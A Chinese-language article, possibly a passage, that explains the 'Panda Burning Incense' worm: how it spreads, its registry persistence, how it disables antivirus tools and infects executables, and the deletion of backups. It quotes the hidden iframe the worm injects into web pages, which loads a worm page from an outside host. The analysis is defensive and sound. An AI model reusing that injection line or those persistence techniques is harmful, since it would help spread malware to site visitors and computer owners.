近一段时间，一个属于威金的最新变种蠕虫病毒—“熊猫烧香”在互联网上疯狂肆虐，这种病毒以“熊猫烧香”头像作为可执行程序的图标，诱骗用户双击执行。不幸中招后，计算机中的所有.EXE文件都会被自动感染病毒，而且被感染的程序图标统统变成“熊猫烧香”标志。许多杀毒软件根本杀不死该病毒，一旦中招多数人往往只能“忍痛割爱”地将硬盘中所有程序文件全部删除。
      从严格意义上来说，“熊猫烧香”病毒是从去年十二月份开始流行的，按理说常用的杀毒软件都应能升级应对了，不过考虑到“熊猫烧香”病毒的变种频出、生命力惊人，经过如此长的一段时间仍然没有死绝。为了让各位网民用户远离“熊猫烧香”病毒，本文下面就对该病毒的运行特征、预防、查杀进行全面介绍，希望能对各位带来帮助。

认识“熊猫烧香”病毒
      “熊猫烧香”，也叫“武汉男生”，事实上属于蠕虫病毒的变种，而且是经过多次变种而来的。该病毒通过木马、软件或网页恶意代码进行传播，一旦计算机感染病毒后，计算机中的所有可执行文件图标都会自动变成“熊猫烧香”图案，这或许就是该病毒被称为“熊猫烧香”的缘由吧。用户计算机不小心感染该病毒后，计算机系统可能出现频繁重新启动、硬件文件被强行破坏，甚至还会发生系统蓝屏现象。此外，该病毒的其他变种还能通过局域网进行传播，感染局域网中所有工作站系统，危害极大，能使整个局域网瞬间发生崩溃，无法正常使用；有的变种病毒会自动在所有网页文件末尾添加病毒代码，一旦这些文件上传到网站服务器中的话，就会导致其他网友用户浏览这些网站内容时也被病毒感染。

病毒运行特征
      “熊猫烧香”病毒运行后，会把自身复制到“C:WINDOWSSystem32Driversspoclsv.exe”，同时修改注册表中“HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun”分支下面的svcshare键值，让其数值变成“ C:WINDOWSSystem32Driversspoclsv.exe”，从而实现随开机自动启动目的，同时该病毒还会自动在硬盘各分区根目录下生成“setup.exe”文件和“autorun.inf”文件。
      该病毒一旦运行，计算机中的众多杀毒软件与安全程序都将被强行关闭，并禁用杀毒软件的相关服务，而且能够循环遍历计算机中所有分区下的文件夹，自动感染所有.EXE、.SCR、.PIF、.COM文件，并自动更改文件图标为熊猫举着三炷香的标志，同时跳过关键系统文件；打开每一个被感染过的文件夹时，我们能够看到“Desktop_ini”隐藏文件，该文件的内容就是病毒感染的具体日期。
      该病毒还能感染所有.HTML、.HTM、.ASP、.PHP、.JSP、.ASPX文件，并在计算机所有脚本文件中自动加入类似“<iframe src=http://www.krvkr.com/worm.htm width="0" height="0"></iframe>”的网页代码。
      病毒发作后，会自动修改注册表中“HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionExplorerAdvancedFolderHiddenSHOWALL”分支下面的“CheckedValue”键值，导致用户无法查看隐藏文件与系统文件。
      此外，该病毒还会自动删除.GHO文件，以便使用户的系统备份文件丢失，从而无法完成系统恢复。